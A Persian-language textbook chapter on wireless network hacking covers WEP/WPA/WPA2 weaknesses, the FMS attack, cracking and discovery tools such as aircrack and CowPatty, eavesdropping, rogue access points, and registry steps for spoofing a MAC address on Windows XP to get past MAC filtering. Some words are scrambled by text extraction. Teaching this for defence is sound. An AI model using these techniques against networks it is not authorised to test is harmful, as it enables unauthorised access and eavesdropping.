ﻫﻚ ﺷﺒﻜﻪ ﻫﺎي واﻳﺮﻟﺲ

ﻣﻘﺪﻣﻪ

ﻳﻜﻲ از ﻧﻘﺎط ورودي ﻫﻜﺮﻫﺎ ﺑﻪ ﺷﺒﻜﻪ، اﺳﺘﻔﺎده از ﺷﺒﻜﻪ ﻫﺎي واﻳﺮﻟﺲ اﺳﺖ . ﺑﻪ ﺧﺎﻃﺮ ﺧﺎﺻﻴﺖ broadcast ﺑﻮدن ﻓﺮﻛﺎﻧﺲ رادﻳﻮﻳﻲ ﺷﺒﻜﻪ ﻫﺎي واﻳﺮﻟﺲ و ﺳﺎزﮔﺎري ﺳﺮﻳﻊ ﺗﻜﻨﻮﻟﻮژي ﻫﺎي واﻳﺮﻟﺲ ﺑﺮاي ﺷﺒﻜﻪ ﻫﺎي ﺧﺎﻧﮕﻲ و ﺗﺠﺎري، آﺳﻴﺐ ﭘﺬﻳﺮي ﻫﺎي زﻳﺎدي دارﻧﺪ . .

ﺑﺴﻴﺎري از ﺷﺒﻜﻪ ﻫﺎي ﻣﺤﻠﻲ واﻳﺮﻟﺲ ( WLAN) ، ﺑﺮ ﻣﺒﻨﺎي اﺳﺘﺎﻧﺪارد IEEE 802.11 و ا ﻟﺤﺎﻗﻴ ﻪ ﻫﺎي آن از ﻗﺒﻴﻞ 802.11b ، 802.11a ، و 802.11n رﺎﻛ ﻣ ﻲ ﺪﻨﻨﻨﻛ . اﺳﺘﺎﻧﺪارد 802.11 ، ﺗﻨﻬﺎ ﻗﺎﺑﻠﻴﺖ ﻫﺎي اﻣﻨﻴﺘﻲ اوﻟﻴﻪ ار دراد و ﺿﻌﻒ ﻫﺎي زﻳﺎدي دارد . اﻟﺤﺎﻗﻴﻪ 802.11i ، آﺧﺮﻳﻦ راه ﺣﻞ اﻣﻨﻴﺘﻲ اﺳﺖ ﻛﻪ ﺿﻌﻒ ﻫﺎي 802.11 را ﭘﻮﺷﺶ ﻣﻲ دﻫﺪ . اﺗﺤﺎدﻳﻪ Wi-Fi ، ﮔﻮاﻫﻴﻨﺎﻣﻪ ﻫﺎي اﻣﻨﻴﺘﻲ ﺑﻴﺸﺘﺮي ﻛﻪ WPA و WPA2 ﻧﺎﻣﻴﺪه ﻣﻲ ﺷﻮﻧﺪ را ﺑﺮاي ﭘﺮ ﻛﺮدن ﻓﺎﺻﻠﻪ ﺑﻴﻦ اﺳﺘﺎﻧﺪارد اﺻﻠﻲ 802.11 و آﺧﺮﻳﻦ اﻟﺤﺎﻗﻴﻪ 802.11i ، اراﺋﻪ داده اﺳﺖ . در اﻳﻦ ﻓﺼﻞ در ﻣﻮرد آﺳﻴﺐ ﭘﺬﻳﺮي ﻫﺎ و راه ﺣﻞ ﻫﺎي اﻣﻨﻴﺘﻲ ﺑﺮ ﻣﺒﻨﺎي اﺳﺘﺎﻧﺪاردﻫﺎي IEEE و Wi-Fi ﺑﺤﺚ ﺧﻮاﻫﻴﻢ ﻛﺮد . .

اﺳﺘﺎﻧﺪاردﻫﺎي واﻳﺮﻟﺲ

802.11 : اوﻟﻴﻦ اﺳﺘﺎﻧﺪارد واﻳﺮﻟﺲ ﺑﻮد ﻛﻪ ﺳﻪ ﻻﻳﻪ ﻓﻴﺰﻛﻲ DSSS ، FHSS و Infrared را ﺗﻌﺮﻳﻒ ﻣﻲ ﻛﻨﺪ . .

802.11a : ﻛﺎﻧﺎل ﻫﺎي ﺑﻴﺸﺘﺮ، ﺳﺮﻋﺖ ﺑﺎﻻ، ﺗﺪاﺧﻞ ﻛﻤﺘﺮ

802.11b : ﻇﻬﻮر ﭘﺮوﺗﻜﻞ WiFi ، اﺳﺘﺎﻧﺪارد ﻏﻴﺮ رﺳﻤﻲ

802.11g : ﻣﺸﺎﺑﻪ 802.11b ، اﻣﺎ ﺳﺮﻳﻌﺘﺮ

802.11i : ﺑﻬﺒﻮد در اﻣﻨﻴﺖ ﺷﺒﻜﻪ واﻳﺮﻟﺲ

802.16 : زﻳﺮﺳﺎﺧﺖ واﻳﺮﻟﺲ ﺑﺮاي ﻣﺴﺎﻓﺖ ﻫﺎي ﻃﻮﻻﻧﻲ

Blutooth : ﮔﺰﻳﻨﻪ اي ﺑﺮاي ﺟﺎﻳﮕﺰﻳﻨﻲ ﻛﺎﺑﻞ

900MHz : ﺳﺮﻋﺖ ﭘﺎﻳﻴﻦ، ﭘﻮﺷﺶ ﻛﻢ، و ﻣﺸﻜﻼت ﺳﺎزﮔﺎري 179

ﻣﻔﺎﻫﻴﻢ واﻳﺮﻟﺲ

آﻧﺘﻦ: آﻧﺘﻦ ﻫﺎ، ﭘﺎﻟﺲﻫﺎي اﻟﻜﺘﺮوﻧﻴﻜﻲ را ﺑﻪ اﻣﻮاج رادﻳﻮﻳﻲ و ﺑﺮﻋﻜﺲ ﺗﺒﺪﻳﻞ ﻣﻲ ﻛﻨﻨﺪ و ﺑﺮاي ارﺳﺎل و درﻳﺎﻓﺖ داده ﻫﺎ ﻣﻬﻢ ﻫﺴﺘﻨﺪ . دو ﻧﻮع آﻧﺘﻦ وﺟﻮد دارد : omni و directional . .

Access Point: ﻗﻄﻌﻪ اي از ﻳﻚ ﺳﺨﺖ اﻓﺰار ارﺗﺒﺎﻃﻲ واﻳﺮﻟﺲ اﺳﺖ ﻛﻪ ﻳﻚ ﻧﻘﻄﻪ ﻣﺮﻛﺰي اﻳﺠﺎد ﻣﻲ ﻛﻨﺪ . ﻧﻘﺶ آن در ﺷﺒ ﻜﻪ ﻫﺎي واﻳﺮﻟﺲ، ﻣﺜﻞ ﻧﻘﺶ ﻫﺎب در ﺷﺒﻜﻪ ﻫﺎي ﻛﺎﺑﻠﻲ اﺳﺖ . .

SSID: ﻳﻚ ﺷﻨﺎﺳﻪ ﻣﻨﺤﺼﺮﺑﻔﺮد اﺳﺖ ﻛﻪ دﺳﺘﮕﺎه ﻫﺎي واﻳﺮﻟﺲ ﺑﺮاي اﻳﺠﺎد و ﻧﮕﻬﺪاري ارﺗﺒﺎط واﻳﺮﻟﺲ زا نآ اﺳﺘﻔﺎده ﻣﻲ ﻨﻛ ﻨﺪ . SSID ، ﻳﻚ رﺷﺘﻪ اﻟﻔﺒﺎﻳﻲ اﺳﺖ ﻛﻪ ﺷﺒﻜﻪ ﻫﺎﻳﻲ ﻛﻪ در ﻳﻚ ﻛﺎﻧﺎل ﻛﺎر ﻣﻲ ﻛﻨﻨﺪ را از ﻫﻢ ﺗﻔﻜﻴﻚ ﻣ ﻲ ﻛﻨﺪ . ﻫﻤﭽﻨﻴﻦ ﺑﻪ ﻋﻨﻮان ﺷﻨﺎ ﺳﻪ ﺑﻴﻦ access point ﻫﺎ و ﻛﻼﻳﻨﺖ ﻋﻤﻞ ﻣﻲ ﻛﻨﺪ . زﻣﺎﻧﻴﻜﻪ SSID ﭘﻴﺶ ﻓﺮض ﺗﻐﻴﻴﺮ ﻧﻜﻨﺪ، ﺑﺎ ﻣﺸﻜﻞ اﻣﻨﻴﺘﻲ ﻣﻮاﺟﻪ ﻣﻲ ﺷﻮﻳﻢ.

ﻣﻜﺎﻧﻴﺰم ﻫﺎي اﺣﺮاز ﻫﻮﻳﺖ WEP و WPA ، و ﺗﻜﻨﻴﻚ ﻫﺎي ﺷﻜﺴﺘﻦ آﻧﻬﺎ

ﺑﺮاي اﺣﺮاز ﻫﻮﻳﺖ ﻛﻼﻳﻨﺖ ﻫﺎ ﺑﻪ ﻳﻚ access point در ﺷﺒﻜﻪ ﻫﺎي واﻳﺮﻟﺲ، دو روش وﺟﻮد دارد : ﺳﻴﺴﺘﻢ ﺑﺎز ( open system و) اﺣﺮاز ﻫﻮﻳﺖ ﻛﻠﻴﺪ ﻣﺸﺘﺮك ( shared key .) در ﺣﺎﻟﺖ ﺳﻴﺴﺘﻢ ﺑﺎز، ﻫﻴﭻ ﻣﻜﺎﻧﻴﺰم اﻣﻨﻴﺘﻲ اراﺋﻪ ﻧﻤﻲ ﺷﻮد اﻣﺎ درﺧﻮاﺳﺖ ارﺗﺒﺎط ﺑﺎ ﺷﺒﻜﻪ ﺳﺎده ﺗﺮ ﻣﻲ ﺷﻮد . در اﺣﺮاز ﻫﻮﻳﺖ ﻛﻠﻴﺪ ﻣﺸﺘﺮك، از ﻛﻠﻴﺪ WEP ﺑﺮاي اﺣﺮاز ﻫﻮﻳﺖ ﻛﻼﻳﻨﺖ اﺳﺘﻔﺎده ﻣﻲ ﺷﻮد . .

اوﻟﻴﻦ ﮔﺰﻳﻨﻪ ﺑﺮاي اﻣﻨﻴﺖ در ﺷﺒﻜﻪ ﻫﺎي واﻳﺮﻟﺲ ، اﺳﺘﻔﺎده از WEP اﺳﺖ . WEP ﺑﺮاي رﻣﺰﮔﺬاري داده ﻫﺎ ﺑﺮ روي ﺷﺒﻜﻪ ﻫﺎي واﻳﺮﻟﺲ اﺳﺘﻔﺎده ﻣﻲ ﺷﻮد و ﻣﻲ ﺗﻮاﻧﺪ ﻫﻤﺮاه ﺑﺎ ﻛﻠﻴﺪ ﻣﺸﺘﺮك ﺑﺮاي اﺣﺮاز ﻫﻮﻳﺖ ﻛﻼﻳﻨﺖ ﻫﺎ اﺳﺘﻔﺎده ﺷﻮد . ﺑﺮاي رﻣﺰﮔﺬاري داده ﻫﺎ، WEP از ﻛﻠﻴﺪﻫﺎي رﻣﺰﮔﺬاري 64 ﺑﻴﺘﻲ ﻳﺎ 128 ﺑﻴﺘﻲ اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ . اﻳﻦ ﻛﻠﻴﺪ WEP ياراد ﻳﻚ ﻛﻠﻴﺪ 40 ﺑﻴﺘﻲ ﻳﺎ 104 ﺑﻴﺘﻲ اﺳﺖ ﻛﻪ ﻛﺎرﺑﺮ ﺗﻌﺮﻳﻒ ﻛﺮده ﻛﻪ ﺑﺎ 24 ﺑﻴﺖ Initialization Vector ) IV ) ﺗﺮﻛﻴﺐ ﻣﻲ ﺷﻮد و ﻛﻠﻴﺪ WEP را ﺑﺼﻮرت 64 ﺑﻴﺘﻲ ﻳﺎ 128 ﺑﻴﺘﻲ ﻣﻲ .ﺪﻨﻛ .ﺪﻨﻛ

ﻓ ﺮآﻳﻨﺪي ﻛﻪ ﻃﻲ آن RC4 از IV اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ، ﻧﻘﻄﻪ ﺿﻌﻒ WEP اﺳﺖ : ﺑﻪ ﻫﻜﺮ اﺟﺎزه ﺷﻜﺴﺘﻦ ﻛﻠﻴﺪ WEP را ﻣﻲ دﻫﺪ . روﺷﻲ ﺑﺎ ﻧﺎم ﺣﻤﻠﻪ FMS ، از ﺑﺎﻳﺖ ﻫﺎي رﻣﺰ ﺷﺪه ﺧﺮوﺟﻲ ﺑﺮاي ﺗﻌﻴﻴﻦ ﻛﻠﻴﺪ اﺣﺘﻤﺎﻟﻲ اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ . اﻳﻦ روش ﺣﻤﻠﻪ در ﻧﺮم اﻓﺰارﻫﺎﻳﻲ ﻫﻤﭽﻮن WEPCrack ، AirSnort ، و aircrack وﺟﻮد دارد ﺗﺎ از آﺳﻴﺐ ﭘﺬﻳﺮي WEP ﺳﻮاﺳﺘﻔﺎده ﻛﻨﻨﺪ . ﻫﺮ ﭼﻨﺪ ﻛﻪ ﻣﻤﻜﻦ اﺳﺖ ﻫﻜﺮي ﺑﺨﻮاﻫﺪ ﺑﺎ روش brute force ، ﻛﻠﻴﺪ WEP را ﺑﺸﻜﻨﺪ اﻣﺎ راﻳﺞ ﺗﺮﻳﻦ ﺗﻜﻨﻴﻚ ﺑﺮاي اﻳﻦ ﻣﻨﻈﻮر، ﺣﻤﻠﻪ FMS اﺳﺖ . .

180

WPA ، ﻳﻚ اﺳﺘﺎﻧﺪارد رﺳﻤﻲ ﺑﺮاي IEEE ﻧﻴﺴﺖ اﻣﺎ ﺑﺎ اﺳﺘﺎﻧﺪارد 802.11i ﻛﻪ ﺧﻮاﻫﺪ آﻣﺪ ﺳﺎزﮔﺎر اﺳﺖ . ﺑﺮاي رﻣﺰﮔﺬاري داده ﻫﺎ از TKIP و ﺑﺮاي اﺣﺮاز ﻫﻮﻳﺖ ، از WPA Personal ﻳﺎ WPA Enterprise ، اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ ﻛﻪ ﭘﻴﺎده ﺳﺎزي اﻣﻨﻲ از RC4 اﺳﺖ . WPA Personal ، ﺑﺮاي اﺣﺮاز ﻫﻮﻳﺖ ﻛﺎرﺑﺮان، از ﻋﺒﺎرت ASCII اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ در ﺣﺎﻟﻴﻜﻪ WPA Enterprise ، از RADIUS Server اﺳﺘﻔﺎده ﻣﻲ ﺪﻛﻨ . WPA Enterprise ، از ﻟﺤﺎظ اﻣﻨﻴﺘﻲ ﺑﺴﻴﺎر ﻗﺪرﺗﻤﻨﺪﺗﺮ اﺳﺖ اﻣﺎ ﻣﺴﺘﻠﺰم اﻳﺠﺎد RADIUS Server اﺳﺖ . TKIP ، ﻛﻠﻴﺪ رﻣﺰﮔﺬاري را rotate ﻣﻲ ﻛﻨﺪ ﺗﺎ ﺿﻌﻒ WEP را ﺑﺮﻃﺮف ﻛﻨﺪ و در ﻧﺘﻴﺠﻪ، از ﺑﺮوز ﺣﻤﻼت ﺟﻠﻮﮔﻴﺮي ﻛﻨﺪ . .

WPA2 ، ﻣﺸﺎﺑﻪ 802.11i اﺳﺖ و از AES ﺑﺮاي رﻣﺰﮔﺬاري داده ﻫﺎ اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ . AES ، ﺑﻪ ﻋﻨﻮان ﻳﻚ اﻟﮕﻮرﻳﺘﻢ رﻣﺰﮔﺬاري ﻏﻴﺮ ﻗﺎﺑﻞ ﺷﻜﺴﺘﻦ ﺗﻠﻘﻲ ﻣﻲ ﺷﻮد . WPA2 ، اﺟﺎزه اﺳﺘﻔﺎده از TKIP در ﻃﻮل دوره اﻧﺘﻘﺎل ار ﻣ ﻲ ﺪﻫد ﺪﻫد ﻲ و mixed mode security ﻧﺎﻣﻴﺪه ﻣﻲ ﺷﻮد . Mixed mode ﺑﻪ اﻳﻦ ﻣﻌﻨﻲ اﺳﺖ ﻛﻪ ﺑﺮاي رﻣﺰﮔﺬاري داده ﻫﺎ، ﻣﻲ ﺗﻮاﻧﺪ از TKIP و ﻳﺎ AES اﺳﺘﻔﺎده ﻛﻨﺪ . اﻟﮕﻮرﻳﺘﻢ AES ﻧﻴﺎز ﺑﻪ ﭘﺮدازﻧﺪه ﻗﺪرﺗﻤﻨﺪي دارد اﻳﻦ ﺑﺪان ﻣﻌﻨﻲ اﺳﺖ ﻛﻪ دﺳﺘﮕﺎه ﻫﺎﻳﻲ ﻛﻪ داراي ﭘﺮدازﺷﮕﺮ ﺿﻌﻴﻒ ﺗﺮي ﻫﺴﺘﻨﺪ ، از ﻗﺒﻴﻞ PDA ، ﻣﻤﻜﻦ اﺳﺖ ﺗﻨﻬﺎ از TKIP ﭘﺸﺘﻴﺒﺎﻧﻲ ﻛﻨﻨﺪ . WPA Personal و WPA2 Personal ، از ﭘﺴﻮرد ﺑﺮاي اﺣﺮاز ﻫﻮﻳﺖ ﻛﻼﻳﻨﺖ ﻫﺎي واﻳﺮﻟﺲ اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﻨﺪ . WPA Enterprise و WPA2 Enterprise ، ﻛﺎرﺑﺮان را از ﻃﺮﻳﻖ RADIUS Server و ﺑﺎ اﺳﺘﻔﺎده از اﺳﺘﺎﻧﺪاردﻫﺎي 802.1X ﻳﺎ EAP اﺣﺮاز ﻫﻮﻳﺖ ﻣﻲ ﻛﻨﻨﺪ . ﻫﻤﭽﻨﻴﻦ 802.11i و WPA2 ، از ﻫﻤﺎن ﻣﻜﺎﻧﻴﺰم رﻣﺰﮔﺬاري و اﺣﺮاز ﻫﻮﻳﺖ WPA2 اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ . .

181

ﺟﺪول زﻳﺮ، ﮔﺰﻳﻨﻪ ﻫﺎي اﺣﺮاز ﻫﻮﻳﺖ و رﻣﺰﮔﺬاري را ﺑﺮاي ﺷﺒﻜﻪ ﻫﺎي واﻳﺮﻟﺲ ﻧﺸﺎن ﻣﻲ دﻫﺪ . .

رﻣﺰﮔﺬاري اﺣﺮاز ﻫﻮﻳﺖ ﺿﻌﻒ

اﺳﺘﺎﻧﺪارد IV WEP WEP IEEE 802.11 ﺳﺒﺐ ﺷﻜﺴﺘﻪ ﺷﺪن ﻛﻠﻴﺪ WEP ﻣﻲ ﺷﻮد . ﺑﺮاي رﻣﺰﮔﺬاري و اﺣﺮاز ﻫﻮﻳﺖ ﻫﻤﻪ ﻛﻼﻳﻨﺖ ﻫﺎي واﻳﺮﻟﺲ، از ﻳﻚ ﻛﻠﻴﺪ اﺳﺘﻔﺎده ﻣﻲ ﺷﻮد

TKIP WPA ﭘﺴﻮرد ﻳﺎ RADIUS ﭘﺴﻮرد ﺑﺮاي ﺣﻤﻠﻪ دﻳﻜﺸﻨﺮي، آﺳﻴﺐ ﭘﺬﻳﺮ ( 802.1x/EAP ) اﺳﺖ

AES WPA2 ﭘﺴﻮرد ﻳﺎ RADIUS ﭘﺴﻮرد ﺑﺮاي ﺣﻤﻠﻪ دﻳﻜﺸﻨﺮي، آﺳﻴﺐ ﭘﺬﻳﺮ ( 802.1x/EAP ) اﺳﺖ

AES IEEE 802.11i ﭘﺴﻮرد ﻳﺎ RADIUS ﭘﺴﻮرد ﺑﺮاي ﺣﻤﻠﻪ دﻳﻜﺸﻨﺮي، آﺳﻴﺐ ﭘﺬﻳﺮ ( 802.1x/EAP ) اﺳﺖ

اﺻﻄﻼﺣﺎت ﻫﻚ ﺷﺒﻜﻪ واﻳﺮﻟﺲ

WarWalking : ﭘﻴﺎده روي در ﻣﺤﻴﻂ ﺑﺮاي ﻳﺎﻓﺘﻦ ﺷﺒﻜﻪ ﻫﺎي واﻳﺮﻟﺲ ﺑﺎز

Wardriving : راﻧﻨﺪﮔﻲ در ﻣﺤﻴﻂ ﺑﺮاي ﻳﺎﻓﺘﻦ ﺷﺒﻜﻪ ﻫﺎي واﻳﺮﻟﺲ ﺑﺎز

WarFlying : ﭘﺮواز در ﻣﺤﻴﻂ ﺑﺮاي ﻳﺎﻓﺘﻦ ﺷﺒﻜﻪ ﻫﺎي واﻳﺮﻟﺲ ﺑﺎز

WarChalking : اﺳﺘﻔﺎده از chalk ﺑﺮاي ﻳﺎﻓﺘﻦ ﺷﺒﻜﻪ ﻫﺎي واﻳﺮﻟﺲ ﺑﺎز

Blue Jacking : اﺳﺘﻔﺎده از ﺗﻜﻨﻮﻟﻮژي ﺑﻠﻮﺗﻮث ﺑﺮاي دزدي ﻣﻮﻗﺘﻲ ﺗﻠﻔﻦ ﻫﻤﺮاه ﺷﺨﺺ دﻳﮕﺮ

GPS : ﺑﺮاي ﻳﺎﻓﺘﻦ ﺷﺒﻜﻪ ﻫﺎي ﺑﺎز اﺳﺘﻔﺎده ﻣﻲ ﺷﻮد

182

اﺑﺰارﻫﺎي ﻫﻚ Aircrack ، ﻧﺮم اﻓﺰاري ﺑﺮاي ﺷﻜﺴﺘﻦ ﭘﺴﻮرد WEP اﺳﺖ . اﻳﻦ اﺑﺰار ﻧﻤﻲ ﺗﻮاﻧﺪ ﺑﺴﺘﻪ ﻫﺎ را ﺑﮕﻴﺮد ﺑﻠﻜﻪ ﺑﺮاي ﺷﻜﺴﺘﻦ ﭘﺴﻮرد ﭘﺲ از ﮔﺮﻓﺘﻦ ﺑﺴﺘﻪ ﻫﺎي رﻣﺰ ﺷﺪه ﺑﺎ اﺳﺘﻔﺎده از اﺑﺰار دﻳﮕﺮ ﺑﻜﺎر ﻣﻲ رود . Aircrack ﺑﺮ روي وﻳﻨﺪوز و ﻟﻴﻨﻮﻛﺲ اﺟﺮا ﻣﻲ ﺷﻮد . .

WEPCrack و AirSnort ، اﺑﺰارﻫﺎي ﺷﻜﺴﺘﻦ ﭘﺴﻮرد در ﻣﺤﻴﻂ ﻫﺎي ﻟﻴﻨﻮﻛﺴﻲ ﻫﺴﺘﻨﺪ . .

NetStumbler و Kismet ، اﺑﺰارﻫﺎي ﻛﺸﻒ ﺷﺒﻜﻪ ﻫﺎي واﻳﺮﻟﺲ ﻫﺴﺘﻨﺪ . اﻳﻦ اﺑﺰارﻫﺎ، SSID ، MAC address ، ﺣﺎﻟﺖ اﻣﻨﻴﺘﻲ، و ﻛﺎﻧﺎل ﺷﺒﻜﻪ واﻳﺮﻟﺲ را ﺷﻨﺎﺳﺎﻳﻲ ﻣﻲ ﻛﻨﺪ . ﻋﻼوه ﺑﺮ اﻳﻦ، Kismet ﻣﻲ ﺗﻮاﻧﺪ ﺑﺮ اﺳﺎس SSID ﻫﺎي ﻣﺨﻔﻲ، ﺷﺒﻜﻪ ﻫﺎي واﻳﺮﻟﺲ را ﻛﺸﻒ ﻛﻨﺪ، ﺑﺴﺘﻪ ﻫﺎي را ﺟﻤﻊ آوري ﻛﻨﺪ و ﻗﺎﺑﻠﻴﺖ IDS را ار اﺋﻪ دﻫﺪ . .

WEPdecrypt ، اﺑﺰاري ﺑﺮاي ﺣﺪس ﻛﻠﻴﺪ WEP ﺑﺮ ﻣﺒﻨﺎي dictionary attack و key generator اﺳﺖ . .

CowPatty اﺑﺰاري ﺑﺮاي ﺷﻜﺴﺘﻦ WPA-PSK ﺑﻪ روش brute force اﺳﺖ . .

اﺳﺘﺮاق ﺳﻤﻊ ﻛﻨﻨﺪه ﻫﺎي واﻳﺮﻟﺲ و ﻗﺮار دادن SSID ﻫﺎ و MAC spoofing

ﻳﻜﻲ از راﻳﺞ ﺗﺮﻳﻦ ﺣﻤﻼت در ﺷﺒﻜﻪ واﻳﺮﻟﺲ، اﺳﺘﺮاق ﺳﻤﻊ اﺳﺖ . اﻳﻦ ﻳﻜﻲ از آﺳﺎن ﺗﺮﻳﻦ ﺣﻤﻼت اﺳﺖ و ﻣﻌﻤﻮﻻ ﺑﺮ روي hotspot ﻫﺎ ﻳﺎ access point ﻫﺎﻳﻲ ﻛﻪ ﺑﺼﻮرت ﭘﻴﺶ ﻓﺮض ﻧﺼﺐ ﺷﺪه اﻧﺪ، اﻧﺠﺎم ﻣﻲ ﺷﻮد ﺑﺮاي اﻳﻨﻜﻪ ﺑﺴﺘﻪ ﻫﺎ ﺑﺼﻮرت رﻣﺰ ﻧﺸﺪه از ﻃﺮﻳﻖ ﺷﺒﻜﻪ واﻳﺮﻟﺲ ارﺳﺎل ﻣﻲ ﺷﻮﻧﺪ . در ﺷﺒﻜﻪ وا ﻳﺮﻟﺲ ﻛﻪ رﻣﺰ ﻧﺸﺪه اﺳﺖ، ﭘﺴﻮردﻫﺎي ﭘﺮوﺗﻜﻞ ﻫﺎي دﺳﺘﺮﺳﻲ ﺑﻪ ﺷﺒﻜﻪ، از ﺟﻤﻠﻪ POP3 ، FTP و SMTP ﺑﺼﻮرت رﻣﺰ ﻧﺸﺪه ﻗﺎﺑﻞ درﻳﺎﻓﺖ ﻫﺴﺘﻨﺪ . .

SSID ، ﻧﺎم ﺷﺒﻜﻪ واﻳﺮﻟﺲ اﺳﺖ و ﻣﻲ ﺗﻮاﻧﺪ در beacon ﻗﺮار ﺑﮕﻴﺮد . اﮔﺮ دو ﺷﺒﻜﻪ واﻳﺮﻟﺲ ﺑﺼﻮرت ﻓﻴﺰﻳﻜﻲ ﻧﺰدﻳﻚ ﻫﻢ ﺑﺎﺷﻨﺪ، SSID ﻣﺸﺨﺺ ﻛﻨﻨﺪه ﻫﺮ ﻛﺪام از ﺷﺒﻜﻪ ﻫﺎ اﺳﺖ . ﻣﻌﻤﻮﻻ SSID ﺑﺼﻮرت رﻣﺰ ﻧﺸﺪه در ﺑﺴﺘﻪ beacon ارﺳﺎل ﻣﻲ ﺷﻮد . ﺑﺴﻴﺎري از access point ﻫﺎ، اﺟﺎزه ﻣﺨﻔﻲ ﻛﺮدن SSID را ﺑﻪ ﻣﺪﻳﺮان ﺷﺒﻜﻪ ﻣﻲ دﻫﻨﺪ . ﺑﺎ اﻳﻦ ﺣﺎل، اﻳﻦ ﻳﻚ ﻣﻜﺎﻧﻴﺰم اﻣﻨﻴﺘﻲ ﻗﻮي ﻧﻴﺴﺖ ﺑﺮاي اﻳﻨﻜﻪ ﺑﺮﺧﻲ از اﺑﺰارﻫﺎ ﻣﻲ ﺗﻮاﻧﻨﺪ SSID را از ﺑﺴﺘﻪ ﻫﺎي دﻳﮕﺮ ﺑﺨﻮاﻧﻨﺪ . .

ﻳﻚ راه ﺣﻞ اﻣﻨﻴﺘﻲ ﺟﺪﻳﺪ در ﺗﻜﻨﻮﻟﻮژي واﻳﺮﻟﺲ، اﺳﺘﻔﺎده از MAC filtering اﺳﺖ . ﻣﺪﻳﺮ ﺷﺒﻜﻪ، ﻟﻴﺴﺘﻲ از MAC address ﻫﺎي ﻣﻌﺘﺒﺮ را وارد ﻣﻲ ﻛﻨﺪ ﺗﺎ اﺟﺎزه دﺳﺘﺮﺳﻲ ﺑﻪ access point را ﭘﻴﺪا ﻛﻨﻨﺪ . ﺗﻨﻈﻴﻤﺎت MAC filter ﻫﺎ ﺳﺨﺖ اﺳﺖ و ﺑﺮاي ﺷﺒﻜﻪ ﺑﺰرگ، scaleable ﻧﻴﺴﺖ ﺑﺮاي اﻳﻨﻜﻪ ﺑﺎﻳﺪ ﺑﺮ روي ﻫﺮ access point اﻧﺠﺎم ﺷﻮد . اﻧﺠﺎم MAC spoofing ، ﺳﺎده اﺳﺖ و MAC filtering را ﺧﻨﺜﻲ ﻣﻲ ﻛﻨﺪ . از آﻧﺠﺎﺋﻴﻜﻪ ﻫﺪرﻫﺎي MAC ، ﻫﻴﭽﮕﺎه رﻣﺰﮔﺬاري ﻧﻤﻲ ﺷﻮﻧﺪ، ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ ﻳﻚ MAC address ﻣﻌﺘﺒﺮ را ﺷﻨﺎﺳﺎﻳﻲ ﻛﻨﺪ . .

183

ﺗﻐﻴﻴﺮ دﺳﺘﻲ MAC Address در وﻳﻨﺪوز XP

ﺑﺮاي اﻳﻨﻜﺎر وارد رﺟﻴﺴﺘﺮي وﻳﻨﺪوز ﺷﻮﻳﺪ و وارد ﻣﺴﻴﺮ زﻳﺮ ﺷﻮﻳﺪ : :

HKEY_LOCAL_MACHINE > System > CurrentControlSet > Control

ﻓﻮﻟﺪر class را ﺑﺎز ﻛﻨﻴﺪ ﺗﺎ ﻓﻮﻟﺪر {4D36E972-E325-11CE-BFC1-08002bE10318} را ﭘﻴﺪا ﻛﻨﻴﺪ و آن را ﺑﺎز ﻛﻨﻴﺪ . اﻳﻦ ﻓﻮﻟﺪر ﺷﺎﻣﻞ اﻃﻼﻋﺎت رﺟﻴﺴﺘﺮي وﻳﻨﺪو ز XP ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﻛﺎرت ﺷﺒﻜﻪ اي ﻛﻪ ﺑﺮ روي وﻳﻨﺪوز ﻧﺼﺐ ﻛﺮده اﻳﺪ اﺳﺖ . ﻛﺎرت ﺷﺒﻜﻪ واﻳﺮﻟﺲ ﺧﻮد را ﭘﻴﺪا ﻛﻨﻴﺪ از ﻣﻨﻮي Edit ، ﮔﺰﻳﻨﻪ New و ﺳﭙﺲ String Values را اﻧﺘﺨﺎب ﻛﻨﻴﺪ . ﻋﺒﺎرت NetworkAddress را ﺗﺎﻳﭗ ﻛﻨﻴﺪ . ﺑﺮ روي آن راﺳﺖ ﻛﻠﻴﻚ ﻛﻨﻴﺪ و ﮔﺰﻳﻨﻪ Modify را اﻧﺘﺨﺎب ﻛﻨﻴﺪ . MAC Address ﺟﺪﻳﺪ را ﺗﺎﻳﭗ ﻛﻨﻴﺪ و ﺑﺮ روي OK ﻛﻠﻴﻚ ﻛﻨﻴﺪ . ﺑﻌﺪ از راه اﻧﺪازي ﻛﺎﻣﭙﻴﻮﺗﺮ، MAC Address ﺟﺪﻳﺪ ﻣﻮرد اﺳﺘﻔﺎده ﻗﺮار ﺧﻮاﻫﺪ ﮔﺮﻓﺖ . .

اﺑﺰارﻫﺎي ﻫﻚ

SMAC ، اﺑﺰاري ﺑﺮاي MAC spoofing اﺳﺖ ﻛﻪ ﺑﺮاي ﺟﻌﻞ آدرس ﻛﺎرﺑﺮ و دﺳﺘﺮﺳﻲ ﺑﻪ ﺷﺒﻜﻪ اﺳﺘﻔﺎده ﻣﻲ ﺷﻮد . .

Rogue Access Point ( ﺗﻘﻠﺒﻲ ) )

Access point ﺗﻘﻠﺒﻲ ، access point ﻫﺎﻳﻲ در ﺷﺒﻜﻪ ﻫﺎي واﻳﺮﻟﺲ ﻫﺴﺘﻨﺪ ﻛﻪ ﺑﺮاي اﺗﺼﺎل ﺑﻪ ﺷﺒﻜﻪ ﻫﺪف، ﻣﺠﻮز ﻧﺪارﻧﺪ . اﻳﻦ access point ﻫﺎ، ﺣﻔﺮه اي در ﺷﺒﻜﻪ ﺑﺎز ﻣﻲ ﻛﻨﻨﺪ . ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ ﻳﻚ access point ﺗﻘﻠﺒﻲ در ﺷﺒﻜﻪ ﻗﺮار دﻫﺪ ﻳﺎ ﻛﺎرﻣﻨﺪي ﺑﻪ ﻃﻮر ﻧﺎﺧ ﻪﺘﺳاﻮ ، ﺑﺎ اﺗﺼﺎل ﻳﻚ access point ﺑﻪ ﺷﺒﻜﻪ، ﻳﻚ ﺣﻔﺮه اﻣﻨﻴﺘﻲ اﻳﺠﺎد ﻛﻨﺪ . 